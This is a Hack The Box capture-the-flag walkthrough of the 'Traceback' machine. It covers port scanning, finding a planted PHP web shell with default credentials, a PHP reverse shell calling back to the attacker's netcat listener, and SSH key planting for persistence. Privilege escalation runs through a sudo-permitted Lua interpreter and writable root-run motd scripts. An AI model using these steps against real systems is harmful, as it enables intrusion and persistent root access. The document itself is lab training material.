Traceback
Contents
Port scan
u505@naos:~/HTB/Machines/Traceback$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.181
Starting masscan 1.0.5 at 2020-12-29 21:14:48 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 22/tcp on 10.10.10.181 Discovered open port 80/tcp on 10.10.10.181
u505@naos:~/HTB/Machines/Traceback$ nmap -sC -sV traceback Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-29 16:14 EST Nmap scan report for traceback (10.10.10.181) Host is up (0.037s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA) | 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA) |_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Help us Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.87 seconds
SSH port
u505@naos:~/HTB/Machines/Traceback$ ssh xh4h@traceback
The authenticity of host 'traceback (10.10.10.181)' can't be established.
ECDSA key fingerprint is SHA256:7PFVHQKwaybxzyT2EcuSpJvyQcAASWY9E/TlxoqxInU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'traceback,10.10.10.181' (ECDSA) to the list of known hosts.
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
xh4h@traceback's password:
The SSH message have been modified.
Web Port
u505@naos:~/HTB/Machines/Traceback$ curl http://traceback <!DOCTYPE html> <html> ... <body> <center> <h1>This site has been owned</h1> <h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2> <h3> - Xh4H - </h3> <!--Some of the best web shells that you might need ;)--> </center> </body> </html>
The source page doesn't provide too much information except that a backdoor has been left.
Dirsearch
u505@naos:~/HTB/Machines/Traceback$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "txt,html,jpg,png,php" -f -t 100 -u http://10.10.10.181
_|. _ _ _ _ _ _|_ v0.4.1 (_||| _) (/_(_|| (_| )
Extensions: txt, html, jpg, png, php | HTTP method: GET | Threads: 100 | Wordlist size: 1543640
Error Log: /opt/utils/dirsearch/logs/errors-20-12-29_16-34-40.log
Target: http://10.10.10.181/
Output File: /opt/utils/dirsearch/reports/10.10.10.181/_20-12-29_16-34-40.txt
[16:34:40] Starting: [16:34:40] 200 - 1KB - /index.html [16:34:41] 403 - 293B - /icons/ [16:34:52] 200 - 529KB - /bg.jpg CTRL+C detected: Pausing threads, please wait... [e]xit / [c]ontinue: e
Canceled by the user
An image file is found, but it is a dead end.
u505@naos:~/HTB/Machines/Traceback$ wget traceback/bg.jpg --2020-12-29 16:27:30-- http://traceback/bg.jpg Resolving traceback (traceback)... 10.10.10.181 Connecting to traceback (traceback)|10.10.10.181|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 541668 (529K) [image/jpeg] Saving to: ‘bg.jpg’
bg.jpg 100%[===================>] 528.97K 623KB/s in 0.8s
2020-12-29 16:27:31 (623 KB/s) - ‘bg.jpg’ saved [541668/541668]
u505@naos:~/HTB/Machines/Traceback$ steghide info bg.jpg "bg.jpg": format: jpeg capacity: 37.3 KB Try to get information about embedded data ? (y/n) y Enter passphrase: steghide: could not extract any data with that passphrase!
Dirsearch for web shells
The easiest way to create a backdoor on a linux with apache is to put a php web shell. This a quite good list
u505@naos:~/HTB/Machines/Traceback$ curl https://github.com/JohnTroony/php-webshells/tree/master/Collection | html2text | grep "php$" | sed 's/\.php$//' > shelllist % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 282k 0 282k 0 0 600k 0 --:--:-- --:--:-- --:--:-- 598k
I got the list and store it in a file.
u505@naos:~/HTB/Machines/Traceback$ cat shelllist 529 AK-74 Ajax_PHP_Command_Shell ... zacosmall zehir4
Launch dirsearch with the shell list.
u505@naos:~/HTB/Machines/Traceback$ python3 /opt/utils/dirsearch/dirsearch.py -w shelllist -e "php" -f -t 100 -u http://10.10.10.181
_|. _ _ _ _ _ _|_ v0.4.1 (_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 100 | Wordlist size: 357
Error Log: /opt/utils/dirsearch/logs/errors-20-12-29_16-39-11.log
Target: http://10.10.10.181/
Output File: /opt/utils/dirsearch/reports/10.10.10.181/_20-12-29_16-39-11.txt
[16:39:11] Starting: [16:39:12] 200 - 1KB - /smevk.php
Task Completed
There is a php script :)
WebShell
The web shell asks for a password.
From the web site with the list of web shells, I download the smevk web shell source code.
u505@naos:~/HTB/Machines/Traceback$ wget https://raw.githubusercontent.com/JohnTroony/php-webshells/master/Collection/smevk.php --2020-12-29 16:46:41-- https://raw.githubusercontent.com/JohnTroony/php-webshells/master/Collection/smevk.php Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.0.133 Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.0.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 99706 (97K) [text/plain] Saving to: ‘smevk.php’
smevk.php 100%[===================>] 97.37K --.-KB/s in 0.01s
2020-12-29 16:46:41 (6.81 MB/s) - ‘smevk.php’ saved [99706/99706]
The default user and password is admin/admin.
u505@naos:~/HTB/Machines/Traceback$ head smevk.php -n 23 <?php /*
SmEvK_PaThAn Shell v3 Coded by Kashif Khan . https://www.facebook.com/smevkpathan smevkpathan@gmail.com Edit Shell according to your choice. Domain read bypass. Enjoy!
*/ //Make your setting here. $deface_url = 'http://pastebin.com/raw.php?i=FHfxsFGT'; //deface url here(pastebin). $UserName = "admin"; //Your UserName here. $auth_pass = "admin"; //Your Password. //Change Shell Theme here// $color = "#8B008B"; //Fonts color modify here. $Theme = '#8B008B'; //Change border-color accoriding to your choice. $TabsColor = '#0E5061'; //Change tabs color here. #-------------------------------------------------------------------------------
?> <?php
And it worked.
Upload reverse shell
I prepared my reverse shell.
u505@naos:~/HTB/Machines/Traceback$ grep CHANGE u505.php
$ip = '10.10.14.12'; // CHANGE THIS
$port = 4444; // CHANGE THIS
Raised my listener
u505@naos:~/HTB/Machines/Traceback$ rlwrap nc -lnvp 4444 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
And upload my file.
Call my reverse shell.
u505@naos:~/HTB/Machines/Traceback$ curl http://traceback/u505.php
And access is granted.
u505@naos:~/HTB/Machines/Traceback$ rlwrap nc -lnvp 4444 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.181. Ncat: Connection from 10.10.10.181:46378. Linux traceback 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux 03:28:15 up 14:06, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare) /bin/sh: 0: can't access tty; job control turned off python3 -c 'import pty; pty.spawn("/bin/bash")' webadmin@traceback:/$
SSH access
tail /etc/passwd nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin webadmin:x:1000:1000:traceback,,,:/home/webadmin:/bin/bash sshd:x:106:65534::/run/sshd:/usr/sbin/nologin sysadmin:x:1001:1001::/home/sysadmin:/bin/sh
First look for the home directory of webadmin. Noticed user sysadmin.
cd /home/webadmin webadmin@traceback:/home/webadmin$ ls -l total 8 -rw-rw-r-- 1 sysadmin sysadmin 122 Mar 16 2020 note.txt webadmin@traceback:/home/webadmin$ cat note.txt - sysadmin - I have left a tool to practice Lua. I'm sure you know where to find it. Contact me if you have any question.
A note has been left from sysadmin.
webadmin@traceback:/home/webadmin$ cd .ssh
I generate a key pair
u505@naos:~/HTB/Machines/Traceback$ ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/home/u505/.ssh/id_rsa): u505.key Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in u505.key Your public key has been saved in u505.key.pub The key fingerprint is: SHA256:AQaypxLQMuJQRZHcz78/C7+14+RCKRhX6UIvC+YKMpY u505@naos The key's randomart image is: +---[RSA 3072]----+ |.oo+==o . | |* .oo... . o | |=o. . o.. + | | o o *.+ o | |. .. oS* + . | | .E . o + o | | . o . . .+ o | | . .oo+.. | | .=*+. | +----[SHA256]-----+
webadmin@traceback:/home/webadmin/.ssh$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDCl6LNtADuE5AeTNcF0whGHx2/YRyNLjvHLq/QOnQcjrhs1+m4Yhjxb49JCOyCkh/ZsdW3yGw6alJHu3ucouQVW/CaXKk9fm1HQtklL7e4bWWeSvPChuI2egZdoB/7nxrOYX8lGrLrBzvdT0y0RMTtKjfTRdbajOSsaN+oPN7DYnrjM/ZBRd41XbJ7SVkz4fxKFeU0ZzVVTLHanuDmGFJHgMKZjnMTiflIWRSmLCRKkcq3UpTgkGXy3aBy9K8zfK2UjcFkym8X/edeRltV3W2t1hqwoex8sA3axLno4q6brsbns7TN+RmukfrUWuejESZXz7iPR15SEopsKpfw0/wLagpSccEvZ4oTrnhmSg7Kc3248LkhTS/cbGWzqMusCFhL6AM1rSVeNz4DtESCsRssQkVjO7qe6IWW0rRrT6tX4eeSFsyPNxtZCuVIumZ78CB3q1eQgZbwPWPOXs8ROgtwUZPSlmE7ZCji/TSz/ZKR6JdPaL8ra1f5xEH4DDFMtPU= u505@naos' > authorized_keys webadmin@traceback:/home/webadmin/.ssh$ chmod 600 authorized_keys
Now I can login with confortable ssh access
u505@naos:~/HTB/Machines/Traceback$ ssh -i u505.key webadmin@traceback ################################# -------- OWNED BY XH4H --------- - I guess stuff could have been configured better ^^ - #################################
Welcome to Xh4H land
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Feb 27 06:29:02 2020 from 10.10.14.3 webadmin@traceback:~$ whoami webadmin
Webadmin enum
u505@naos:~/HTB/Machines/Traceback$ scp -i u505.key LinEnum.sh pspy64 webadmin@traceback:/home/webadmin/ ################################# -------- OWNED BY XH4H --------- - I guess stuff could have been configured better ^^ - ################################# LinEnum.sh 100% 46KB 353.5KB/s 00:00 pspy64s 100% 1129KB 2.9MB/s 00:00
webadmin@traceback:~$ ./LinEnum.sh -t
The enumeration finds sudo accessible.
[+] We can sudo without supplying a password!
Matching Defaults entries for webadmin on traceback:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/sysadmin/luvit
And the history shows us that the lua tool has been used with sudo.
/home/webadmin/.bash_history
ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua
rm privesc.lua
logout
stty raw -echostty raw -echo
stty raw -echo
ls
exit
Pivot to user sysadmin
We create a lua file and execute it as sysadmin
webadmin@traceback:~$ echo 'os.execute("/bin/sh")' > privesc.lua
webadmin@traceback:~$ sudo -u sysadmin /home/sysadmin/luvit /home/webadmin/privesc.lua
$ whoami
sysadmin
Again, we give us confortable access via ssh.
$ pwd /home/webadmin $ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDCl6LNtADuE5AeTNcF0whGHx2/YRyNLjvHLq/QOnQcjrhs1+m4Yhjxb49JCOyCkh/ZsdW3yGw6alJHu3ucouQVW/CaXKk9fm1HQtklL7e4bWWeSvPChuI2egZdoB/7nxrOYX8lGrLrBzvdT0y0RMTtKjfTRdbajOSsaN+oPN7DYnrjM/ZBRd41XbJ7SVkz4fxKFeU0ZzVVTLHanuDmGFJHgMKZjnMTiflIWRSmLCRKkcq3UpTgkGXy3aBy9K8zfK2UjcFkym8X/edeRltV3W2t1hqwoex8sA3axLno4q6brsbns7TN+RmukfrUWuejESZXz7iPR15SEopsKpfw0/wLagpSccEvZ4oTrnhmSg7Kc3248LkhTS/cbGWzqMusCFhL6AM1rSVeNz4DtESCsRssQkVjO7qe6IWW0rRrT6tX4eeSFsyPNxtZCuVIumZ78CB3q1eQgZbwPWPOXs8ROgtwUZPSlmE7ZCji/TSz/ZKR6JdPaL8ra1f5xEH4DDFMtPU= u505@naos' > /home/sysadmin/.ssh/authorized_keys $ chmod 600 /home/sysadmin/.ssh/authorized_keys
Et voila
u505@naos:~/HTB/Machines/Traceback$ ssh -i u505.key sysadmin@traceback ################################# -------- OWNED BY XH4H --------- - I guess stuff could have been configured better ^^ - #################################
Welcome to Xh4H land
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Dec 29 15:32:43 2020 from 10.10.14.12 $ whoami sysadmin
User flag
$ cat user.txt <USER_FLAG>
Sysadmin enum
$ cd /home/webadmin $ ./LinEnum.sh -t
And pspy64
webadmin@traceback:~$ ./pspy64 ... 2020/12/30 04:05:01 CMD: UID=0 PID=15206 | sleep 30 2020/12/30 04:05:01 CMD: UID=0 PID=15205 | /bin/sh -c /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ 2020/12/30 04:05:01 CMD: UID=0 PID=15204 | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ 2020/12/30 04:05:01 CMD: UID=0 PID=15203 | /usr/sbin/CRON -f 2020/12/30 04:05:01 CMD: UID=0 PID=15202 | /usr/sbin/CRON -f 2020/12/30 04:05:31 CMD: UID=0 PID=15208 | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm /var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/ ...
There is a cron job as root that copy files from /var/backup/.update-motd.d/ to /etc/update-motd.d
$ cd /var/backups/.update-motd.d/ $ ls -ltra total 32 -rwxr-xr-x 1 root root 299 Aug 25 2019 91-release-upgrade -rwxr-xr-x 1 root root 604 Aug 25 2019 80-esm -rwxr-xr-x 1 root root 4264 Aug 25 2019 50-motd-news drwxr-xr-x 3 root root 4096 Aug 25 2019 .. -rwxr-xr-x 1 root root 981 Aug 25 2019 00-header -rwxr-xr-x 1 root root 982 Aug 27 2019 10-help-text drwxr-xr-x 2 root root 4096 Mar 5 2020 .
We don't have rights to change files in /var/backup/.update-motd.d/. But after a second glance at LinEnum results
[-] Files not owned by user but writable by group: -rwxrwxr-x 1 root sysadmin 4264 Dec 30 04:02 /etc/update-motd.d/50-motd-news -rwxrwxr-x 1 root sysadmin 982 Dec 30 04:02 /etc/update-motd.d/10-help-text -rwxrwxr-x 1 root sysadmin 299 Dec 30 04:02 /etc/update-motd.d/91-release-upgrade -rwxrwxr-x 1 root sysadmin 981 Dec 30 04:02 /etc/update-motd.d/00-header -rwxrwxr-x 1 root sysadmin 604 Dec 30 04:02 /etc/update-motd.d/80-esm -rw-rw-rw- 1 webadmin webadmin 22 Dec 30 03:52 /home/webadmin/privesc.lua
We have write access over files in folder /etc/update-motd.d
Privileges escalation
$ man update-motd
Executable scripts in /etc/update-motd.d/* are executed by pam_motd(8) as the root user at each login, and this information is concatenated in /run/motd.dynamic. The order of script execution is determined by the run-
parts(8) --lsbsysinit option (basically alphabetical order, with a few caveats).
We check the folder
$ cd /etc/update-motd.d $ ls -l total 24 -rwxrwxr-x 1 root sysadmin 981 Dec 30 04:14 00-header -rwxrwxr-x 1 root sysadmin 982 Dec 30 04:14 10-help-text -rwxrwxr-x 1 root sysadmin 4264 Dec 30 04:14 50-motd-news -rwxrwxr-x 1 root sysadmin 604 Dec 30 04:14 80-esm -rwxrwxr-x 1 root sysadmin 299 Dec 30 04:14 91-release-upgrade
We can modify the 00-header file
$ vi 00-header $ cat 00-header #!/bin/sh # # 00-header - create the header of the MOTD # Copyright (C) 2009-2010 Canonical Ltd. # # Authors: Dustin Kirkland <kirkland@canonical.com> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along # with this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
[ -r /etc/lsb-release ] && . /etc/lsb-release
echo "\nWelcome to Xh4H land \n" echo "\nU505 was here too!" echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDCl6LNtADuE5AeTNcF0whGHx2/YRyNLjvHLq/QOnQcjrhs1+m4Yhjxb49JCOyCkh/ZsdW3yGw6alJHu3ucouQVW/CaXKk9fm1HQtklL7e4bWWeSvPChuI2egZdoB/7nxrOYX8lGrLrBzvdT0y0RMTtKjfTRdbajOSsaN+oPN7DYnrjM/ZBRd41XbJ7SVkz4fxKFeU0ZzVVTLHanuDmGFJHgMKZjnMTiflIWRSmLCRKkcq3UpTgkGXy3aBy9K8zfK2UjcFkym8X/edeRltV3W2t1hqwoex8sA3axLno4q6brsbns7TN+RmukfrUWuejESZXz7iPR15SEopsKpfw0/wLagpSccEvZ4oTrnhmSg7Kc3248LkhTS/cbGWzqMusCFhL6AM1rSVeNz4DtESCsRssQkVjO7qe6IWW0rRrT6tX4eeSFsyPNxtZCuVIumZ78CB3q1eQgZbwPWPOXs8ROgtwUZPSlmE7ZCji/TSz/ZKR6JdPaL8ra1f5xEH4DDFMtPU= u505@naos' > /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys $ exit Connection to traceback closed.
We log once as sysadmin to apply the script (before the cron job erase it).
u505@naos:~/HTB/Machines/Traceback$ ssh -i u505.key sysadmin@traceback ################################# -------- OWNED BY XH4H --------- - I guess stuff could have been configured better ^^ - #################################
Welcome to Xh4H land
U505 was here too!
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Wed Dec 30 03:57:54 2020 from 10.10.14.12 $ exit Connection to traceback closed.
Now we can login as root.
u505@naos:~/HTB/Machines/Traceback$ ssh -i u505.key root@traceback ################################# -------- OWNED BY XH4H --------- - I guess stuff could have been configured better ^^ - #################################
Welcome to Xh4H land
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Dec 29 15:33:03 2020 from 10.10.14.12 root@traceback:~# whoami root root@traceback:~# cat root.txt <ROOT_FLAG>
References
- Common PHP webshells you might need for your Penetration Testing assignments or CTF challenges. Do not host the file(s) on your server!
- https://gtfobins.github.io/gtfobins/lua/
Daniel Simao 05:48, 30 December 2020 (EST)
